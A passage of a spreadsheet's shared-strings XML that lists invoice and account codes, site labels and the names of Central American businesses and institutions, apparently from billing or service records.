  </si>
  <si>
    <t>70363OH</t>
  </si>
  <si>
    <t>OH1000180594/LA META REPUESTOS AUTOMOTRICES -</t>
  </si>
  <si>
    <t>F4543820</t>
  </si>
  <si>
    <t>297401557T</t>
  </si>
  <si>
    <t>IP2026295SV</t>
  </si>
  <si>
    <t>297400771T</t>
  </si>
  <si>
    <t>F4543451</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_TIENDA_54</t>
  </si>
  <si>
    <t>F4543452</t>
  </si>
  <si>
    <t>F4543461</t>
  </si>
  <si>
    <t>F4546311</t>
  </si>
  <si>
    <t>F4539953</t>
  </si>
  <si>
    <t>426100005T</t>
  </si>
  <si>
    <t>286900020T</t>
  </si>
  <si>
    <t>238000126T</t>
  </si>
  <si>
    <t>BANCO DE ANTIGUA, S.A.</t>
  </si>
  <si>
    <t>F4544526</t>
  </si>
  <si>
    <t>F4544708</t>
  </si>
  <si>
    <t>F4542759</t>
  </si>
  <si>
    <t>341800119T</t>
  </si>
  <si>
    <t>886200001T</t>
  </si>
  <si>
    <t>INSTITUTO GUATEMALTECO DE MIGRACION.</t>
  </si>
  <si>
    <t>F4543207</t>
  </si>
  <si>
    <t>F4544098</t>
  </si>
  <si>
    <t>F4545245</t>
  </si>
  <si>
    <t>F4544952</t>
  </si>
  <si>
    <t>829800049T</t>
  </si>
  <si>
    <t>589500003T</t>
  </si>
  <si>
    <t>LOGISTICA DE SERVICIOS, S.A.</t>
  </si>
  <si>
    <t>344400568T</t>
  </si>
  <si>
    <t>F4545967</t>
  </si>
  <si>
    <t>62900033T</t>
  </si>
  <si>
    <t>F4542764</t>
  </si>
  <si>
    <t>F4539832</t>
  </si>
  <si>
    <t>F4540851</t>
  </si>
  <si>
    <t>F4540936</t>
  </si>
  <si>
    <t>F4542433</t>
  </si>
  <si>
    <t>575900001T</t>
  </si>
  <si>
    <t>GASOLINERA NORTH WEST EL PARAISO SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4543166</t>
  </si>
  <si>
    <t>F4544955</t>
  </si>
  <si>
    <t>F4543460</t>
  </si>
  <si>
    <t>F4544954</t>
  </si>
  <si>
    <t>23276600SV</t>
  </si>
  <si>
    <t>DECOTEX INTERNATIONAL LTDA DE C.V.</t>
  </si>
  <si>
    <t>297400966T</t>
  </si>
  <si>
    <t>F4542281</t>
  </si>
  <si>
    <t>F4542282</t>
  </si>
  <si>
    <t>5263543ON</t>
  </si>
  <si>
    <t>90001908420T</t>
  </si>
  <si>
    <t>944900002T</t>
  </si>
  <si>
    <t>ORGANISMO LEGISLATIVO.</t>
  </si>
  <si>
    <t>3511514ON</t>
  </si>
  <si>
    <t>ID1036056SV</t>
  </si>
  <si>
    <t>QVC, S.A DE C.V.</t>
  </si>
  <si>
    <t>F4540769</t>
  </si>
  <si>
    <t>ID1145126SV</t>
  </si>
  <si>
    <t>TELEVISION MIGUELENA S.A. DE C.V.</t>
  </si>
  <si>
    <t>90001904186T</t>
  </si>
  <si>
    <t>1723880OH</t>
  </si>
  <si>
    <t>OH1001077742</t>
  </si>
  <si>
    <t>452149ON</t>
  </si>
  <si>
    <t>5610303ON</t>
  </si>
  <si>
    <t>F4541498</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_EL_BILBAO</t>
  </si>
  <si>
    <t>F4539892</t>
  </si>
  <si>
    <t>F4539893</t>
  </si>
  <si>
    <t>F4542167</t>
  </si>
  <si>
    <t>927328OH</t>
  </si>
  <si>
    <t>OH1000763289/REGIMEN DE APORTACIONES PRIVADAS -</t>
  </si>
  <si>
    <t>ID1112027SV</t>
  </si>
  <si>
    <t>245700113T</t>
  </si>
  <si>
    <t>F4542571</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C164</t>
  </si>
  <si>
    <t>ID1026285SV</t>
  </si>
  <si>
    <t>GREAT PLACE TO WORK INSTITUTE OF EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>8200138T</t>
  </si>
  <si>
    <t>291700006T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2583</t>
  </si>
  <si>
    <t>F4542891</t>
  </si>
  <si>
    <t>518687OH</t>
  </si>
  <si>
    <t>F4544024</t>
  </si>
  <si>
    <t>1529203OH</t>
  </si>
  <si>
    <t>OH1000790557/GUAMANET GUAMANET</t>
  </si>
  <si>
    <t>F4546136</t>
  </si>
  <si>
    <t>F4545097</t>
  </si>
  <si>
    <t>F4539896</t>
  </si>
  <si>
    <t>F4542164</t>
  </si>
  <si>
    <t>F4543852</t>
  </si>
  <si>
    <t>F4539699</t>
  </si>
  <si>
    <t>907300002T</t>
  </si>
  <si>
    <t>IMPULSO FITNESS, S.A.</t>
  </si>
  <si>
    <t>IP2037302SV</t>
  </si>
  <si>
    <t>758500145T</t>
  </si>
  <si>
    <t>F4541006</t>
  </si>
  <si>
    <t>F4541554</t>
  </si>
  <si>
    <t>1707041OH</t>
  </si>
  <si>
    <t>OH1001072622</t>
  </si>
  <si>
    <t>F4545276</t>
  </si>
  <si>
    <t>90001909986T</t>
  </si>
  <si>
    <t>F4541007</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_EL_JICARO</t>
  </si>
  <si>
    <t>948600001T</t>
  </si>
  <si>
    <t>DESCANSE S.A.</t>
  </si>
  <si>
    <t>446100015T</t>
  </si>
  <si>
    <t>F4541728</t>
  </si>
  <si>
    <t>22395400SV</t>
  </si>
  <si>
    <t>INGENIERIA Y DISTRIBUCION SA DE CV</t>
  </si>
  <si>
    <t>917800007T</t>
  </si>
  <si>
    <t>F4539251</t>
  </si>
  <si>
    <t>F4540454</t>
  </si>
  <si>
    <t>F4543420</t>
  </si>
  <si>
    <t>F4545185</t>
  </si>
  <si>
    <t>F4543849</t>
  </si>
  <si>
    <t>F4541012</t>
  </si>
  <si>
    <t>F4543627</t>
  </si>
  <si>
    <t>F4541731</t>
  </si>
  <si>
    <t>F4540963</t>
  </si>
  <si>
    <t>F4542729</t>
  </si>
  <si>
    <t>F4543926</t>
  </si>
  <si>
    <t>265900407T</t>
  </si>
  <si>
    <t>5637263ON</t>
  </si>
  <si>
    <t>HUGO TECHNOLOGIES</t>
  </si>
  <si>
    <t>F4541805</t>
  </si>
  <si>
    <t>927330OH</t>
  </si>
  <si>
    <t>F4544842</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_AGENCIA_RETALHULEU</t>
  </si>
  <si>
    <t>F4539870</t>
  </si>
  <si>
    <t>535200070T</t>
  </si>
  <si>
    <t>F4541905</t>
  </si>
  <si>
    <t>681000001T</t>
  </si>
  <si>
    <t>CORPORACION RADIOELECTRONICA S.A.</t>
  </si>
  <si>
    <t>F4545507</t>
  </si>
  <si>
    <t>F4539089</t>
  </si>
  <si>
    <t>5034083ON</t>
  </si>
  <si>
    <t>IP2145278SV</t>
  </si>
  <si>
    <t>F4539438</t>
  </si>
  <si>
    <t>F4539222</t>
  </si>
  <si>
    <t>90001903110T</t>
  </si>
  <si>
    <t>ID1099139SV</t>
  </si>
  <si>
    <t>EDUSSA SA DE CV</t>
  </si>
  <si>
    <t>392800001T</t>
  </si>
  <si>
    <t>LIGA NACIONAL CONTRA EL CANCER</t>
  </si>
  <si>
    <t>863400052T</t>
  </si>
  <si>
    <t>F4539777</t>
  </si>
  <si>
    <t>F4539615</t>
  </si>
  <si>
    <t>894900010T</t>
  </si>
  <si>
    <t>F4539598</t>
  </si>
  <si>
    <t>F4539114</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3036</t>
  </si>
  <si>
    <t>F4539115</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_ATM_SELECTOS_PLAZA_VIVA</t>
  </si>
  <si>
    <t>F4539616</t>
  </si>
  <si>
    <t>F4539788</t>
  </si>
  <si>
    <t>F4539382</t>
  </si>
  <si>
    <t>IP2036054SV</t>
  </si>
  <si>
    <t>F4540563</t>
  </si>
  <si>
    <t>F4539116</t>
  </si>
  <si>
    <t>245700236T</t>
  </si>
  <si>
    <t>F4540434</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SANTA_CRUZ_COBAN</t>
  </si>
  <si>
    <t>F4539596</t>
  </si>
  <si>
    <t>861000001T</t>
  </si>
  <si>
    <t>S.I.T.E.</t>
  </si>
  <si>
    <t>F4539280</t>
  </si>
  <si>
    <t>F4539730</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_104</t>
  </si>
  <si>
    <t>F4541742</t>
  </si>
  <si>
    <t>777700004T</t>
  </si>
  <si>
    <t>F4541135</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_AGENCIA_SANTA_ELENA_PETEN</t>
  </si>
  <si>
    <t>473800018T</t>
  </si>
  <si>
    <t>F4542252</t>
  </si>
  <si>
    <t>F4543522</t>
  </si>
  <si>
    <t>F4541882</t>
  </si>
  <si>
    <t>F4539583</t>
  </si>
  <si>
    <t>7800096T</t>
  </si>
  <si>
    <t>873800002T</t>
  </si>
  <si>
    <t>MUTUAL CORREDORES DE SEGUROS SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4541883</t>
  </si>
  <si>
    <t>F4539434</t>
  </si>
  <si>
    <t>F4543288</t>
  </si>
  <si>
    <t>1709757OH</t>
  </si>
  <si>
    <t>OH1001073502</t>
  </si>
  <si>
    <t>F4539642</t>
  </si>
  <si>
    <t>F4546551</t>
  </si>
  <si>
    <t>F4545881</t>
  </si>
  <si>
    <t>626771OH</t>
  </si>
  <si>
    <t>F4545864</t>
  </si>
  <si>
    <t>F4540999</t>
  </si>
  <si>
    <t>F4539402</t>
  </si>
  <si>
    <t>IP2036053SV</t>
  </si>
  <si>
    <t>F4542063</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_LAS_FLORES</t>
  </si>
  <si>
    <t>1050480OH</t>
  </si>
  <si>
    <t>F4542582</t>
  </si>
  <si>
    <t>F4543679</t>
  </si>
  <si>
    <t>ID1024075SV</t>
  </si>
  <si>
    <t>FEDISAL EDUCACION PARA LA NINEZ Y JUVENTUD.</t>
  </si>
  <si>
    <t>F4541803</t>
  </si>
  <si>
    <t>1436719OH</t>
  </si>
  <si>
    <t>LAZARUS Y LAZARUS SA DE CV</t>
  </si>
  <si>
    <t>F4546137</t>
  </si>
  <si>
    <t>F4546138</t>
  </si>
  <si>
    <t>F4545108</t>
  </si>
  <si>
    <t>F4539524</t>
  </si>
  <si>
    <t>F4545102</t>
  </si>
  <si>
    <t>F4539950</t>
  </si>
  <si>
    <t>F4539620</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0763</t>
  </si>
  <si>
    <t>IDG000175SV</t>
  </si>
  <si>
    <t>F4545427</t>
  </si>
  <si>
    <t>F4544569</t>
  </si>
  <si>
    <t>23222700SV</t>
  </si>
  <si>
    <t>SAVONA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4542789</t>
  </si>
  <si>
    <t>85800009T</t>
  </si>
  <si>
    <t>ALLIANCE ONE TABACO GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4545170</t>
  </si>
  <si>
    <t>F4543236</t>
  </si>
  <si>
    <t>1593522OH</t>
  </si>
  <si>
    <t>WIFINET INNOVACION</t>
  </si>
  <si>
    <t>297400206T</t>
  </si>
  <si>
    <t>1525910OH</t>
  </si>
  <si>
    <t>508200012T</t>
  </si>
  <si>
    <t>F4543424</t>
  </si>
  <si>
    <t>F4541413</t>
  </si>
  <si>
    <t>F4543682</t>
  </si>
  <si>
    <t>F4543683</t>
  </si>
  <si>
    <t>F4544644</t>
  </si>
  <si>
    <t>F4544643</t>
  </si>
  <si>
    <t>F4545187</t>
  </si>
  <si>
    <t>F4545186</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_SALA28</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_7178_3</t>
  </si>
  <si>
    <t>F4543896</t>
  </si>
  <si>
    <t>F4541687</t>
  </si>
  <si>
    <t>22485000SV</t>
  </si>
  <si>
    <t>F4541755</t>
  </si>
  <si>
    <t>F4541757</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3065</t>
  </si>
  <si>
    <t>265900145T</t>
  </si>
  <si>
    <t>F4540534</t>
  </si>
  <si>
    <t>539600007T</t>
  </si>
  <si>
    <t>F4543394</t>
  </si>
  <si>
    <t>25260800SV</t>
  </si>
  <si>
    <t>SEGOVIA GUANDIQUE QUINTANILLA S.A DE C.V.</t>
  </si>
  <si>
    <t>844200002T</t>
  </si>
  <si>
    <t>F4542275</t>
  </si>
  <si>
    <t>540200001T</t>
  </si>
  <si>
    <t>IMPHERSA, S.A.</t>
  </si>
  <si>
    <t>F4541758</t>
  </si>
  <si>
    <t>F4543972</t>
  </si>
  <si>
    <t>3805304ON</t>
  </si>
  <si>
    <t>ON0000409620/GRUPO Q NICARAGUA S.A.-</t>
  </si>
  <si>
    <t>IP2204049SV</t>
  </si>
  <si>
    <t>F4546466</t>
  </si>
  <si>
    <t>F4543887</t>
  </si>
  <si>
    <t>F4542851</t>
  </si>
  <si>
    <t>F4544666</t>
  </si>
  <si>
    <t>F4544667</t>
  </si>
  <si>
    <t>F4543628</t>
  </si>
  <si>
    <t>712300002T</t>
  </si>
  <si>
    <t>F4539508</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_TIENDA_210</t>
  </si>
  <si>
    <t>F4539770</t>
  </si>
  <si>
    <t>F4539087</t>
  </si>
  <si>
    <t>1010842OH</t>
  </si>
  <si>
    <t>F4539393</t>
  </si>
  <si>
    <t>F4539394</t>
  </si>
  <si>
    <t>F4540633</t>
  </si>
  <si>
    <t>F4540686</t>
  </si>
  <si>
    <t>54700022T</t>
  </si>
  <si>
    <t>F4540690</t>
  </si>
  <si>
    <t>4429490ON</t>
  </si>
  <si>
    <t>F4545420</t>
  </si>
  <si>
    <t>90001903390T</t>
  </si>
  <si>
    <t>26688500SV</t>
  </si>
  <si>
    <t>BANCO DE LOS TRABAJADORES DE SAN MIGUEL S.C. DE R.L</t>
  </si>
  <si>
    <t>F4544613</t>
  </si>
  <si>
    <t>F4545039</t>
  </si>
  <si>
    <t>F4546232</t>
  </si>
  <si>
    <t>F4545223</t>
  </si>
  <si>
    <t>47502216T</t>
  </si>
  <si>
    <t>F4543531</t>
  </si>
  <si>
    <t>F4545091</t>
  </si>
  <si>
    <t>5614379ON</t>
  </si>
  <si>
    <t>865100004T</t>
  </si>
  <si>
    <t>F4539756</t>
  </si>
  <si>
    <t>F4539617</t>
  </si>
  <si>
    <t>F4541975</t>
  </si>
  <si>
    <t>F4544522</t>
  </si>
  <si>
    <t>F4545459</t>
  </si>
  <si>
    <t>20514841</t>
  </si>
  <si>
    <t>F4540142</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C999</t>
  </si>
  <si>
    <t>F4541977</t>
  </si>
  <si>
    <t>F4539371</t>
  </si>
  <si>
    <t>F4546122</t>
  </si>
  <si>
    <t>F4542043</t>
  </si>
  <si>
    <t>1525900OH</t>
  </si>
  <si>
    <t>F4539937</t>
  </si>
  <si>
    <t>509400001T</t>
  </si>
  <si>
    <t>BIXA S.A.</t>
  </si>
  <si>
    <t>F4539940</t>
  </si>
  <si>
    <t>1232391OH</t>
  </si>
  <si>
    <t>OH1000139430/LACTHOSA TGU</t>
  </si>
  <si>
    <t>F4544221</t>
  </si>
  <si>
    <t>F4539710</t>
  </si>
  <si>
    <t>IP2168014SV</t>
  </si>
  <si>
    <t>F4543525</t>
  </si>
  <si>
    <t>F4545069</t>
  </si>
  <si>
    <t>F4545261</t>
  </si>
  <si>
    <t>97100245T</t>
  </si>
  <si>
    <t>F4541081</t>
  </si>
  <si>
    <t>F4541828</t>
  </si>
  <si>
    <t>F4543527</t>
  </si>
  <si>
    <t>F4543817</t>
  </si>
  <si>
    <t>F4545038</t>
  </si>
  <si>
    <t>F4541046</t>
  </si>
  <si>
    <t>F4539368</t>
  </si>
  <si>
    <t>F4542041</t>
  </si>
  <si>
    <t>F4542296</t>
  </si>
  <si>
    <t>F4542060</t>
  </si>
  <si>
    <t>F4543819</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3080</t>
  </si>
  <si>
    <t>ID1165086SV</t>
  </si>
  <si>
    <t>F4541083</t>
  </si>
  <si>
    <t>F4542042</t>
  </si>
  <si>
    <t>927764OH</t>
  </si>
  <si>
    <t>F4544865</t>
  </si>
  <si>
    <t>F4545247</t>
  </si>
  <si>
    <t>ID1145117SV</t>
  </si>
  <si>
    <t>F4545302</t>
  </si>
  <si>
    <t>727100040T</t>
  </si>
  <si>
    <t>F4541893</t>
  </si>
  <si>
    <t>47502239T</t>
  </si>
  <si>
    <t>F4543983</t>
  </si>
  <si>
    <t>F4545157</t>
  </si>
  <si>
    <t>F4545158</t>
  </si>
  <si>
    <t>F4539767</t>
  </si>
  <si>
    <t>F4545037</t>
  </si>
  <si>
    <t>781400021T</t>
  </si>
  <si>
    <t>781400009T</t>
  </si>
  <si>
    <t>F4539478</t>
  </si>
  <si>
    <t>F4543877</t>
  </si>
  <si>
    <t>527100004T</t>
  </si>
  <si>
    <t>643757OH</t>
  </si>
  <si>
    <t>F4545883</t>
  </si>
  <si>
    <t>F4539599</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_018</t>
  </si>
  <si>
    <t>F4539769</t>
  </si>
  <si>
    <t>296800016T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C699</t>
  </si>
  <si>
    <t>F4540466</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_COLUA_3AVE_STA_LUCIA_UTATLAN</t>
  </si>
  <si>
    <t>F4544086</t>
  </si>
  <si>
    <t>F4541290</t>
  </si>
  <si>
    <t>F4540599</t>
  </si>
  <si>
    <t>863400012T</t>
  </si>
  <si>
    <t>331000031T</t>
  </si>
  <si>
    <t>F4543688</t>
  </si>
  <si>
    <t>IP2396007SV</t>
  </si>
  <si>
    <t>F4544803</t>
  </si>
  <si>
    <t>F4539917</t>
  </si>
  <si>
    <t>F4539499</t>
  </si>
  <si>
    <t>4804534ON</t>
  </si>
  <si>
    <t>349400079T</t>
  </si>
  <si>
    <t>F4539879</t>
  </si>
  <si>
    <t>450810ON</t>
  </si>
  <si>
    <t>F4541954</t>
  </si>
  <si>
    <t>F4544805</t>
  </si>
  <si>
    <t>F4540828</t>
  </si>
  <si>
    <t>254000016T</t>
  </si>
  <si>
    <t>SAVE THE CHILDREN INTERNATIONAL</t>
  </si>
  <si>
    <t>F4540969</t>
  </si>
  <si>
    <t>IPG003064SV</t>
  </si>
  <si>
    <t>F4539246</t>
  </si>
  <si>
    <t>F4543748</t>
  </si>
  <si>
    <t>F4545284</t>
  </si>
  <si>
    <t>397200041T</t>
  </si>
  <si>
    <t>F4539191</t>
  </si>
  <si>
    <t>F4542261</t>
  </si>
  <si>
    <t>F4540436</t>
  </si>
  <si>
    <t>F4545964</t>
  </si>
  <si>
    <t>297401496T</t>
  </si>
  <si>
    <t>F4541050</t>
  </si>
  <si>
    <t>F4542782</t>
  </si>
  <si>
    <t>F4545963</t>
  </si>
  <si>
    <t>727100095T</t>
  </si>
  <si>
    <t>F4542417</t>
  </si>
  <si>
    <t>616300027T</t>
  </si>
  <si>
    <t>F4540711</t>
  </si>
  <si>
    <t>F4544743</t>
  </si>
  <si>
    <t>1021141OH</t>
  </si>
  <si>
    <t>F4541057</t>
  </si>
  <si>
    <t>F4543478</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_490001</t>
  </si>
  <si>
    <t>99800051T</t>
  </si>
  <si>
    <t>F4542793</t>
  </si>
  <si>
    <t>25232300SV</t>
  </si>
  <si>
    <t>MEGABLOCK S.A. DE C.V.</t>
  </si>
  <si>
    <t>1664322OH</t>
  </si>
  <si>
    <t>F4545020</t>
  </si>
  <si>
    <t>463400002T</t>
  </si>
  <si>
    <t>7801069T</t>
  </si>
  <si>
    <t>F4539500</t>
  </si>
  <si>
    <t>F4541417</t>
  </si>
  <si>
    <t>F4545346</t>
  </si>
  <si>
    <t>F4543760</t>
  </si>
  <si>
    <t>F4542260</t>
  </si>
  <si>
    <t>265900400T</t>
  </si>
  <si>
    <t>F4543929</t>
  </si>
  <si>
    <t>F4545095</t>
  </si>
  <si>
    <t>F4540717</t>
  </si>
  <si>
    <t>F4543578</t>
  </si>
  <si>
    <t>F4540873</t>
  </si>
  <si>
    <t>IPG000179SV</t>
  </si>
  <si>
    <t>F4542647</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4491</t>
  </si>
  <si>
    <t>589500004T</t>
  </si>
  <si>
    <t>F4543608</t>
  </si>
  <si>
    <t>F4544532</t>
  </si>
  <si>
    <t>F4540988</t>
  </si>
  <si>
    <t>F4544222</t>
  </si>
  <si>
    <t>F4543502</t>
  </si>
  <si>
    <t>F4543874</t>
  </si>
  <si>
    <t>F4543255</t>
  </si>
  <si>
    <t>625600002T</t>
  </si>
  <si>
    <t>INVERSIONES BELLA AURORA, SOCIEDAD ANÓNIMA.</t>
  </si>
  <si>
    <t>F4546184</t>
  </si>
  <si>
    <t>F4543253</t>
  </si>
  <si>
    <t>F4543349</t>
  </si>
  <si>
    <t>ID1037126SV</t>
  </si>
  <si>
    <t>90001901217T</t>
  </si>
  <si>
    <t>8902337T</t>
  </si>
  <si>
    <t>F4543572</t>
  </si>
  <si>
    <t>F4539753</t>
  </si>
  <si>
    <t>8900716T</t>
  </si>
  <si>
    <t>90001909712T</t>
  </si>
  <si>
    <t>F4542809</t>
  </si>
  <si>
    <t>F4544553</t>
  </si>
  <si>
    <t>F4545219</t>
  </si>
  <si>
    <t>F4546270</t>
  </si>
  <si>
    <t>F4542201</t>
  </si>
  <si>
    <t>487400011T</t>
  </si>
  <si>
    <t>F4545333</t>
  </si>
  <si>
    <t>F4543267</t>
  </si>
  <si>
    <t>F4542527</t>
  </si>
  <si>
    <t>475800001T</t>
  </si>
  <si>
    <t>INMOBILIARIA E INVERSIONES DOS MIL S.A.</t>
  </si>
  <si>
    <t>F4542526</t>
  </si>
  <si>
    <t>F4546170</t>
  </si>
  <si>
    <t>90001910247T</t>
  </si>
  <si>
    <t>90001910736T</t>
  </si>
  <si>
    <t>773400003T</t>
  </si>
  <si>
    <t>880198OC</t>
  </si>
  <si>
    <t>4102700ON</t>
  </si>
  <si>
    <t>ON0000432021/PAME S.A.(PROG.PRIV.ATENC.MEDIC.ESPEC.) -</t>
  </si>
  <si>
    <t>22730705SV</t>
  </si>
  <si>
    <t>LA CASA DEL REPUESTO, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4540077</t>
  </si>
  <si>
    <t>90001904789T</t>
  </si>
  <si>
    <t>923600001T</t>
  </si>
  <si>
    <t>WET CHEMICAL DE GUATEMALA SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4545057</t>
  </si>
  <si>
    <t>340500043T</t>
  </si>
  <si>
    <t>64600041T</t>
  </si>
  <si>
    <t>863400416T</t>
  </si>
  <si>
    <t>774487OH</t>
  </si>
  <si>
    <t>F4544600</t>
  </si>
  <si>
    <t>F4541931</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3101</t>
  </si>
  <si>
    <t>F4541607</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_VISTRALES</t>
  </si>
  <si>
    <t>F4540167</t>
  </si>
  <si>
    <t>F4540976</t>
  </si>
  <si>
    <t>F4540974</t>
  </si>
  <si>
    <t>1540652OH</t>
  </si>
  <si>
    <t>F4543377</t>
  </si>
  <si>
    <t>F4540993</t>
  </si>
  <si>
    <t>F4540992</t>
  </si>
  <si>
    <t>F4544074</t>
  </si>
  <si>
    <t>F4544075</t>
  </si>
  <si>
    <t>F4544076</t>
  </si>
  <si>
    <t>F4545952</t>
  </si>
  <si>
    <t>1655955OH</t>
  </si>
  <si>
    <t>7801043T</t>
  </si>
  <si>
    <t>F4543912</t>
  </si>
  <si>
    <t>F4540751</t>
  </si>
  <si>
    <t>286900023T</t>
  </si>
  <si>
    <t>F4543616</t>
  </si>
  <si>
    <t>698400008T</t>
  </si>
  <si>
    <t>F4543615</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0810</t>
  </si>
  <si>
    <t>F4545060</t>
  </si>
  <si>
    <t>F4546497</t>
  </si>
  <si>
    <t>F4543800</t>
  </si>
  <si>
    <t>297401520T</t>
  </si>
  <si>
    <t>351300001T</t>
  </si>
  <si>
    <t>SERVICIOS MERCANTILES DE CENTROAMERICA S.A.</t>
  </si>
  <si>
    <t>F4544825</t>
  </si>
  <si>
    <t>F4544827</t>
  </si>
  <si>
    <t>25246500SV</t>
  </si>
  <si>
    <t>LONAS DECORATIVAS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4540440</t>
  </si>
  <si>
    <t>F4541928</t>
  </si>
  <si>
    <t>F4545818</t>
  </si>
  <si>
    <t>F4542486</t>
  </si>
  <si>
    <t>IDG001868SV</t>
  </si>
  <si>
    <t>F4541202</t>
  </si>
  <si>
    <t>90001908692T</t>
  </si>
  <si>
    <t>F4542821</t>
  </si>
  <si>
    <t>780368OH</t>
  </si>
  <si>
    <t>F4546200</t>
  </si>
  <si>
    <t>F4542270</t>
  </si>
  <si>
    <t>CONTR0002519298OC</t>
  </si>
  <si>
    <t>770600046T</t>
  </si>
  <si>
    <t>F4541061</t>
  </si>
  <si>
    <t>F4540858</t>
  </si>
  <si>
    <t>F4540979</t>
  </si>
  <si>
    <t>F4540981</t>
  </si>
  <si>
    <t>F4540400</t>
  </si>
  <si>
    <t>F4540401</t>
  </si>
  <si>
    <t>F4544189</t>
  </si>
  <si>
    <t>F4545093</t>
  </si>
  <si>
    <t>1671055OH</t>
  </si>
  <si>
    <t>OH1001060964</t>
  </si>
  <si>
    <t>F4546274</t>
  </si>
  <si>
    <t>F4542475</t>
  </si>
  <si>
    <t>F4542476</t>
  </si>
  <si>
    <t>IP2165095SV</t>
  </si>
  <si>
    <t>896400001T</t>
  </si>
  <si>
    <t>CAPYNSA, SOCIEDAD ANONIMA.</t>
  </si>
  <si>
    <t>890522OH</t>
  </si>
  <si>
    <t>625900235T</t>
  </si>
  <si>
    <t>F4545443</t>
  </si>
  <si>
    <t>F4546593</t>
  </si>
  <si>
    <t>F4545824</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_0751</t>
  </si>
  <si>
    <t>F4546518</t>
  </si>
  <si>
    <t>F4545288</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T236</t>
  </si>
  <si>
    <t>F4544528</t>
  </si>
  <si>
    <t>F4541209</t>
  </si>
  <si>
    <t>IPG003076SV</t>
  </si>
  <si>
    <t>F4542477</t>
  </si>
  <si>
    <t>F4542478</t>
  </si>
  <si>
    <t>F4543649</t>
  </si>
  <si>
    <t>F4540719</t>
  </si>
  <si>
    <t>F4542464</t>
  </si>
  <si>
    <t>F4542465</t>
  </si>
  <si>
    <t>CONTR0002088697OC</t>
  </si>
  <si>
    <t>IDG000622SV</t>
  </si>
  <si>
    <t>F4545210</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_SANKRIS_MALL</t>
  </si>
  <si>
    <t>F4544671</t>
  </si>
  <si>
    <t>F4545019</t>
  </si>
  <si>
    <t>8901947T</t>
  </si>
  <si>
    <t>F4541282</t>
  </si>
  <si>
    <t>F4541448</t>
  </si>
  <si>
    <t>F4543577</t>
  </si>
  <si>
    <t>F4540880</t>
  </si>
  <si>
    <t>F4544071</t>
  </si>
  <si>
    <t>600800001T</t>
  </si>
  <si>
    <t>EL METRO SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>3777995ON</t>
  </si>
  <si>
    <t>1454731OH</t>
  </si>
  <si>
    <t>F4541917</t>
  </si>
  <si>
    <t>F4544624</t>
  </si>
  <si>
    <t>IP2135027SV</t>
  </si>
  <si>
    <t>25275440SV</t>
  </si>
  <si>
    <t>INVERSIONES DE SALUD S.A DE C.V</t>
  </si>
  <si>
    <t>90001906264T</t>
  </si>
  <si>
    <t>560400001T</t>
  </si>
  <si>
    <t>LICEO ROSALES S.A.</t>
  </si>
  <si>
    <t>887760OH</t>
  </si>
  <si>
    <t>F4541249</t>
  </si>
  <si>
    <t>F4545047</t>
  </si>
  <si>
    <t>F4540721</t>
  </si>
  <si>
    <t>F4542011</t>
  </si>
  <si>
    <t>F4542352</t>
  </si>
  <si>
    <t>F4541752</t>
  </si>
  <si>
    <t>F4541250</t>
  </si>
  <si>
    <t>IP2204095SV</t>
  </si>
  <si>
    <t>F4542470</t>
  </si>
  <si>
    <t>F4539265</t>
  </si>
  <si>
    <t>F4546069</t>
  </si>
  <si>
    <t>F4540722</t>
  </si>
  <si>
    <t>F4539266</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA_649</t>
  </si>
  <si>
    <t>90001910325T</t>
  </si>
  <si>
    <t>F4541923</t>
  </si>
  <si>
    <t>F4542329</t>
  </si>
  <si>
    <t>7800247T</t>
  </si>
  <si>
    <t>F4541762</t>
  </si>
  <si>
    <t>F4545747</t>
  </si>
  <si>
    <t>F4539905</t>
  </si>
  <si>
    <t>F4542655</t>
  </si>
  <si>
    <t>F4542816</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_LA_TRINIDAD_RETALHULEU</t>
  </si>
  <si>
    <t>90001902706T</t>
  </si>
  <si>
    <t>F4540558</t>
  </si>
  <si>
    <t>825730OC</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC007174</t>
  </si>
  <si>
    <t>521700002T</t>
  </si>
  <si>
    <t>NUTRITEC S.A.</t>
  </si>
  <si>
    <t>755000002T</t>
  </si>
  <si>
